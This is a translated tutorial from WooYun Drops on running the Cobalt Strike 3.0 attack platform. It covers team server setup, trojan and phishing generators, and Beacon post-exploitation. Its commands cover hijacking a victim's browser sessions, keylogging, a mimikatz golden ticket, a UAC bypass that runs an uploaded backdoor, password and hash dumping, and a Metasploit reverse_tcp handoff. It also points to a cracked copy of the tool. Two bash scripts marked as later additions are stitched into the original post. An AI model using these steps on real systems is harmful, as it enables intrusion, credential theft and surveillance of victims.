Evi1cg · 2015/11/10

0x00 Overview


Cobalt Strike began as a GUI front end for the Metasploit framework, integrating port forwarding, service scanning, automatic exploitation, multi-mode port listening, Windows EXE trojan generation, Windows DLL trojan generation, Java trojan generation, Office macro virus generation and trojan binding. Its phishing features include site cloning, target information gathering, Java execution, automated browser attacks and so on. Cobalt Strike 3.0 no longer uses the Metasploit framework and runs as a standalone platform, though it can still be used together with Armitage. Here is a cracked version:

Download address: poke me (verify its safety yourself)

Cobalt Strike 3.0 expands on its team server model: several operators can connect to the same team server at once and share attack resources, target information and sessions. Before using Cobalt Strike you need a Java runtime installed; for details see the Java environment setup article (link in the original).

0x01 Running


Unlike earlier versions, Cobalt Strike 3.0 requires a running team server, and the Cobalt Strike 3.0 client connects to it. The team server can be placed on a public host or in whatever environment you want to build the infrastructure in. The Cobalt Strike download contains the following files:

The key files are teamserver and cobaltstrike.jar. Put both in the same directory on the server and run:

sudo ./teamserver 192.168.74.1 msf3

Use a specific IP address rather than 0.0.0.0 or 127.0.0.1; if the host has several network interfaces, give the address that clients should connect to. msf3 is the password for connecting to the team server.

Once the server is running, start the client and connect. The cobaltstrike launcher script simply runs:

java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar $*

In the connect dialog, Host is the team server's IP address, the port defaults to 50050, the user name is arbitrary, and the password is the one set when the team server was started. After clicking Connect, a verification window shows the SHA-256 fingerprint of the team server's self-signed SSL certificate; compare it with the fingerprint the teamserver script printed when it started, and only then click Yes. Accepting an unverified fingerprint leaves the client connection open to a man-in-the-middle.
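As an added example (not from the original post, and not Cobalt Strike's own code), the bash helpers below implement the two checks a practitioner wants at this point: rejecting wildcard or loopback bind addresses for the team server, and comparing the fingerprint shown in the client's verification dialog against the certificate the server actually presents on port 50050. The host addresses, the port and the fingerprint values are assumptions; openssl and network reachability are needed only for fetch_server_fp.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post or of Cobalt Strike itself.
# Checks for the team server start-up and client connection described above.
set -eu

# Reject the bind addresses the post warns against: the team server should
# be started on the specific interface address clients will connect to.
# Returns 0 when the address is an acceptable dotted quad.
teamserver_bind_ok() {
  local ip="${1:-}"
  case "$ip" in
    ""|0.0.0.0|127.*|localhost) return 1 ;;
  esac
  [[ "$ip" =~ ^([0-9]{1,3}\.){3}[0-9]{1,3}$ ]]
}

# Canonical form of a certificate fingerprint: upper-case hex with no
# colons, spaces or "SHA256 Fingerprint=" / "SHA256:" prefix, so the value
# copied from the client dialog can be compared with openssl's output.
normalize_fp() {
  local fp="$1"
  case "$fp" in
    *Fingerprint=*) fp="${fp#*Fingerprint=}" ;;
    SHA256:*|sha256:*) fp="${fp#*:}" ;;
  esac
  fp="${fp//:/}"
  fp="${fp// /}"
  printf '%s' "$fp" | tr '[:lower:]' '[:upper:]'
}

# Returns 0 when two non-empty fingerprints denote the same certificate.
fingerprints_match() {
  [ -n "$(normalize_fp "$1")" ] && [ "$(normalize_fp "$1")" = "$(normalize_fp "$2")" ]
}

# SHA-256 fingerprint of whatever certificate the team server presents.
# Assumes openssl is installed and the server (default port 50050) is reachable.
fetch_server_fp() {
  local host="$1" port="${2:-50050}"
  normalize_fp "$(openssl s_client -connect "${host}:${port}" </dev/null 2>/dev/null \
                  | openssl x509 -noout -fingerprint -sha256)"
}

# Usage: verify_teamserver HOST PORT EXPECTED_FINGERPRINT
# EXPECTED_FINGERPRINT is the value shown in the client's verification dialog.
verify_teamserver() {
  local host="$1" port="$2" expected="$3" actual
  actual="$(fetch_server_fp "$host" "$port")"
  if fingerprints_match "$expected" "$actual"; then
    echo "[+] fingerprint matches: $actual"
  else
    echo "[-] fingerprint MISMATCH: dialog=$(normalize_fp "$expected") server=$actual" >&2
    return 1
  fi
}

# Only act when executed directly with three arguments, so that sourcing
# the file to reuse the functions has no side effects.
if [ "${BASH_SOURCE[0]}" = "$0" ] && [ "$#" -eq 3 ]; then
  verify_teamserver "$@"
fi
```

Run it as `./check_ts.sh 192.168.74.1 50050 'SHA256 Fingerprint=...'` with the fingerprint copied from the dialog before clicking Yes; a mismatch means the client is not talking to the server whose teamserver output you read.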

0x02 Listeners


To use Cobalt Strike you need to create a listener: go to Cobalt Strike->Listeners, then click Add to create your own. Cobalt Strike 3.0 includes these listeners:

  • windows/beacon_dns/reverse_dns_txt
  • windows/beacon_dns/reverse_http
  • windows/beacon_http/reverse_http
  • windows/beacon_https/reverse_https
  • windows/beacon_smb/bind_pipe
  • windows/foreign/reverse_dns_txt
  • windows/foreign/reverse_http
  • windows/foreign/reverse_https
  • windows/foreign/reverse_tcp

windows/beacon_* are Cobalt Strike's built-in Beacon listeners (DNS, HTTP, HTTPS and SMB); windows/foreign/* are foreign listeners, i.e. handlers running in MSF or Armitage. After selecting a listener type, the host field is filled automatically with the IP address the team server was started with; configure the listening port and save, and the listener is created.

0x03 Attacks


The Attacks menu contains two groups of modules. Packages includes:

  • HTML Application generates a malicious HTA trojan file.
  • MS Office Macro generates an Office macro virus file.
  • Payload Generator generates the payload in various languages.
  • USB/CD AutoPlay generates trojan files that run via AutoPlay.
  • Windows Dropper is a binder that bundles a payload with a document.
  • Windows Executable generates a (staged) executable trojan.
  • Windows Executable (S) generates a stageless executable trojan.

Web Drive-by includes:

  • Manage manages the enabled web services.
  • Clone Site clones a site and can record the data victims submit to it.
  • Host File hosts a file for download and lets you change its MIME type.
  • PowerShell Web Delivery is similar to MSF's web_delivery.
  • Signed Applet Attack is a phishing attack using a self-signed Java applet.
  • Smart Applet Attack automatically detects the Java version and exploits Java 1.6.0_45 and earlier and Java 1.7.0_21 and earlier.
  • System Profiler collects information such as OS version, Flash version and browser version from visitors.
  • Spear Phish is the module for email phishing.

0x04 View


The View menu lets testers review each module conveniently; the graphical interface shows information about the victim machines.

  • Applications displays the applications found on victim machines (from the System Profiler).
  • Credentials displays the credentials collected from victim machines, useful for further penetration.
  • Downloads lists downloaded files.
  • Event Log shows the event log, so the system's events can be followed clearly, and the team can chat here.
  • Keystrokes shows the captured keystrokes.
  • Proxy Pivots shows the proxy (pivot) information.
  • Screenshots shows the captured screenshots.
  • Script Console is where you load scripts (Aggressor Script) to extend functionality.
  • Targets lists the targets.
  • Web Log displays the web server's logs.

The Reporting menu is not covered here; it is used for generating reports.

0x05 Beacon


Beacon can egress the network over DNS or HTTP, and you can even switch between HTTP and DNS while communicating with Beacon. It also supports multiple callback hosts: when Beacon is deployed, supply a list of domain names or hosts to call back to, and Beacon rotates through them. The target network's defense team must block every listed host before it can interrupt the communication.

Once you have obtained a session in any way (for example by running the generated EXE directly), Beacon can be used. Right-click the computer and choose Interact to open the Beacon console.

Type help in the Beacon console to see the full command list:

beacon> help

Beacon Commands
===============

    Command                   Description
    -------                   -----------
    browserpivot              Setup a browser pivot session
    bypassuac                 Spawn a session in a high integrity process
    cancel                    Cancel a download that's in-progress
    cd                        Change directory
    checkin                   Call home and post data
    clear                     Clear beacon queue
    covertvpn                 Deploy Covert VPN client
    desktop                   View and interact with target's desktop
    dllinject                 Inject a Reflective DLL into a process
    download                  Download a file
    downloads                 Lists file downloads in progress
    drives                    List drives on target
    elevate                   Try to elevate privileges
    execute                   Execute a program on target
    exit                      Terminate the beacon session
    getsystem                 Attempt to get SYSTEM
    getuid                    Get User ID
    hashdump                  Dump password hashes
    help                      Help menu
    inject                    Spawn a session in a specific process
    jobkill                   Kill a long-running post-exploitation task
    jobs                      List long-running post-exploitation tasks
    kerberos_ccache_use       Apply kerberos ticket from cache to this session
    kerberos_ticket_purge     Purge kerberos tickets from this session
    kerberos_ticket_use       Apply kerberos ticket to this session
    keylogger                 Inject a keystroke logger into a process
    kill                      Kill a process
    link                      Connect to a Beacon peer over SMB
    logonpasswords            Dump credentials and hashes with mimikatz
    ls                        List files
    make_token                Create a token to pass credentials
    mimikatz                  Runs a mimikatz command
    mkdir                     Make a directory
    mode dns                  Use DNS A as data channel (DNS beacon only)
    mode dns-txt              Use DNS TXT as data channel (DNS beacon only)
    mode http                 Use HTTP as data channel
    mode smb                  Use SMB peer-to-peer communication
    net                       Network and host enumeration tool
    note                      Assign a note to this Beacon
    portscan                  Scan a network for open services
    powershell                Execute a command via powershell
    powershell-import         Import a powershell script
    ps                        Show process list
    psexec                    Use a service to spawn a session on a host
    psexec_psh                Use PowerShell to spawn a session on a host
    pth                       Pass-the-hash using Mimikatz
    pwd                       Print current directory
    rev2self                  Revert to original token
    rm                        Remove a file or folder
    rportfwd                  Setup a reverse port forward
    runas                     Execute a program as another user
    screenshot                Take a screenshot
    shell                     Execute a command via cmd.exe
    sleep                     Set beacon sleep time
    socks                     Start SOCKS4a server to relay traffic
    socks stop                Stop SOCKS4a server
    spawn                     Spawn a session
    spawnas                   Spawn a session as another user
    spawnto                   Set executable to spawn processes into
    steal_token               Steal access token from a process
    timestomp                 Apply timestamps from one file to another
    unlink                    Disconnect from parent Beacon
    upload                    Upload a file
    wdigest                   Dump plaintext credentials with mimikatz
    winrm                     Use WinRM to spawn a session on a host
    wmi                       Use WMI to spawn a session on a host

You can view the usage of a command directly with help, for example:

beacon> help browserpivot
Use: browserpivot [pid] [x86|x64]
     browserpivot [stop]    

Setup a Browser Pivot into the specified process. To hijack authenticated
web sessions, make sure the process is an Internet Explorer tab. These
processes have iexplore.exe as their parent process.    

Use "browserpivot stop" to tear down the browser pivoting sessions 
associated with this Beacon.

Here are a few fun features. To see results quickly, set:

beacon> sleep 0

This puts Beacon into an interactive mode that checks in continuously, which is fine in a lab but very noisy on a real engagement; restore a sleep time before moving on.

0x051 Browserpivot

Browser pivot injects into the victim's browser process and starts an HTTP proxy through it; requests the attacker sends through that proxy are made by the victim's browser, so the attacker inherits the victim's authenticated web sessions without needing their password. As the help text above says, the target must be an Internet Explorer tab process (a child of iexplore.exe).

Use ps to find the browser process:

Inject into the process:

beacon> browserpivot 3452 x64

Set the local browser's HTTP proxy to the browser pivot port:

When the victim logs in to a website, the local browser going through the proxy is logged in as well:

The proxy only lives as long as the injected browser process; once the victim closes the browser it stops working. To tear it down yourself, run:

browserpivot stop

0x052 Socks

You can start a SOCKS4a proxy directly from Beacon for intranet penetration testing.

Start the SOCKS server:

beacon> socks 9999

Alternatively, select a session and right-click -> Pivoting -> SOCKS Server to start the SOCKS proxy through that host.

The SOCKS server listens on the team server, so configure proxychains.conf on the team server (or replace 127.0.0.1 with the team server's address) and add:

socks4 127.0.0.1 9999

Then run your intranet tools through proxychains.

Alternatively, tunnel MSF through it directly: click View->Proxy Pivots, select the SOCKS4a proxy and click Tunnel:

Paste the copied commands into msfconsole to enable the proxy:

Stop the SOCKS server:

beacon> socks stop
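As an added example (not from the original post or from Cobalt Strike), the bash helpers below do the two things this section describes: build a proxychains configuration that points at the SOCKS4a server Beacon started, and produce the Metasploit commands that View -> Proxy Pivots -> Tunnel puts on the clipboard. The 127.0.0.1:9999 endpoint, the target 10.0.0.5 and the assumption that the Tunnel button yields a `setg Proxies` line plus `setg ReverseAllowProxy true` are mine. proxychains4, nmap and msfconsole are only needed when something is actually run through the pivot.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post or of Cobalt Strike itself.
# Pivot tooling through the SOCKS4a server that "beacon> socks 9999" starts
# on the team server. PIVOT_HOST/PIVOT_PORT are assumptions; override them
# with the team server's address when proxychains runs on another machine.
set -eu

PIVOT_HOST="${PIVOT_HOST:-127.0.0.1}"
PIVOT_PORT="${PIVOT_PORT:-9999}"

# Print a proxychains config for the given SOCKS4a listener.
# Returns 1 for a non-numeric or out-of-range port instead of emitting a
# config that silently fails to connect.
proxychains_conf() {
  local host="$1" port="$2"
  if ! [[ "$port" =~ ^[0-9]+$ ]] || [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
    echo "proxychains_conf: bad port '$port'" >&2
    return 1
  fi
  cat <<EOF
strict_chain
# resolve names through the proxy so target lookups do not leak out of the pivot
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 ${host} ${port}
EOF
}

# The msfconsole equivalent of View -> Proxy Pivots -> Tunnel (assumed to be
# what the Tunnel button copies): route every module through the SOCKS server
# and allow reverse handlers while a proxy is set.
msf_proxy_rc() {
  local host="$1" port="$2"
  printf 'setg Proxies socks4:%s:%s\nsetg ReverseAllowProxy true\n' "$host" "$port"
}

# Run any command through the pivot with a throw-away config file.
# nmap must be told -sT -Pn: SYN scans and ICMP pings use raw sockets,
# which a SOCKS proxy cannot carry, so they would bypass or break the pivot.
via_pivot() {
  local conf rc=0
  conf="$(mktemp)"
  proxychains_conf "$PIVOT_HOST" "$PIVOT_PORT" > "$conf"
  proxychains4 -q -f "$conf" "$@" || rc=$?
  rm -f "$conf"
  return "$rc"
}

# Examples (run only when the script is executed with an argument):
#   ./pivot.sh scan   -> nmap -sT -Pn -p 445,3389,5985 10.0.0.5 through the pivot
#   ./pivot.sh msf    -> write pivot.rc and start msfconsole with it
if [ "${BASH_SOURCE[0]}" = "$0" ] && [ "$#" -ge 1 ]; then
  case "$1" in
    scan) via_pivot nmap -sT -Pn -p 445,3389,5985 10.0.0.5 ;;
    msf)  msf_proxy_rc "$PIVOT_HOST" "$PIVOT_PORT" > pivot.rc
          msfconsole -q -r pivot.rc ;;
  esac
fi
```

The proxy_dns line matters: without it, name lookups for intranet hosts go out through the operator machine's resolver rather than through the pivot. Anything that needs raw sockets or UDP (ping sweeps, SYN scans, SNMP) will not traverse the SOCKS4a server, which is why the nmap invocation uses a TCP connect scan and skips host discovery.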

0x053 Screenshot&Keylogger

The screenshot command can capture the victim's screen for a period of time:

beacon> screenshot [pid] <x86|x64> [run time in seconds]

or simply

beacon> screenshot

Then go to View->Screenshots to see the captures:

The keylogger is used in the same way:

Use: keylogger [pid] <x86|x64>

Then open View->Keystrokes to see the logged keystrokes:

If you prefer not to use the command line, select the victim computer and right-click ->Explore->Process List; the process list dialog lets you start the screenshot tool and the keystroke logger against a chosen process:

0x054 powershell-import

This feature is handy in post-exploitation: you can import PowerShell frameworks such as Nishang's PowerPreter and then call their functions directly. The imported script is held in memory and made available to subsequent powershell commands in this Beacon. Run:

beacon> powershell-import

Then select Powerpreter.psm1 in the file browser:

Or give the path directly:

powershell-import [/path/to/local/script.ps1]

After the import, PowerPreter's modules are available. To run one, use the powershell command, for example:

beacon> powershell Check-VM

A brief introduction to PowerPreter was posted on Zone earlier: PowerShell post-exploitation framework PowerPreter.

0x055 Kerberos

There are three commands:

  • kerberos_ccache_use: applies a ticket from an MIT Kerberos ccache file to this session
  • kerberos_ticket_purge: clears the tickets of the current session
  • kerberos_ticket_use: applies a ticket from a .kirbi ticket file to this session

The ticket files are read from the attacker's machine by the client and pushed into the Beacon session. A golden ticket is generated with mimikatz (this is the older mimikatz 2.0 syntax; current builds name the account with /user: instead of /admin:):

kerberos::golden /admin:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /ticket:FILE

WooYun Drops also has related articles on Kerberos; if you are interested, check them out:

  • Mimikatz in intranet penetration
  • The golden key to domain penetration

This is said to be very useful in domain penetration.

0x056 BypassUAC

What, you can't read passwords? Dumping credentials needs a high-integrity session, so if the user is a local administrator but the session runs at medium integrity because of UAC, try bypassuac.

Run it directly:

beacon> bypassuac

A new high-integrity Beacon is spawned, and operations that need the highest permissions can be performed from it.

This did not succeed in my Win10 test; I also cover bypassing UAC on Win10 in my blog, details: poke me

Here's how to get the highest permissions on Win10 with a bypassuac PowerShell script. Since Nishang's PowerShell script does not currently support Win10, a script I modified, invoke-BypassUAC.ps1, is used instead.

Generate a Beacon backdoor:

Upload the backdoor:

beacon> cd E:
beacon> upload /Users/evi1cg/Desktop/test.exe

Import the PowerShell script and run the backdoor through it:

beacon> powershell-import /Users/evi1cg/Pentest/Powershell/MyShell/invoke-BypassUAC.ps1
beacon> powershell Invoke-BypassUAC -Command 'E:\test.exe'

A new, elevated Beacon then calls back:

Use the elevated Beacon to read passwords:

beacon> sleep 0
beacon> wdigest

beacon> hashdump

0x06 Working with MSF


Cobalt Strike 3.0 is a standalone platform and no longer uses the Metasploit framework, so how do you get a Meterpreter session through Cobalt Strike? It can still be done. First start a reverse_tcp handler in MSF (add set ExitOnSession false if the handler should keep accepting sessions after the first one):

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.74.1
lhost => 192.168.74.1
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit -j

Create a windows/foreign/reverse_tcp listener in Cobalt Strike. Foreign listeners hand off to Metasploit's x86 stagers, so the handler's payload must be windows/meterpreter/reverse_tcp (not the x64 variant) as set above:

IP is MSF's address and port is the port MSF listens on. Then select the computer and right-click -> Spawn:

Select the listener just created:

The Meterpreter session is obtained successfully.

0x07 Summary


This test used windows/beacon_http/reverse_http. For the DNS listener, see luom's article on building a Cobalt Strike team server and demonstrating DNS communication. This article introduces only some of Cobalt Strike's functions; if there are any mistakes, please correct them. You can explore the other functions of Cobalt Strike yourself, and I will add to this where possible. I hope it is useful to you.

This article was written by Evi1cg and first published on WooYun Drops.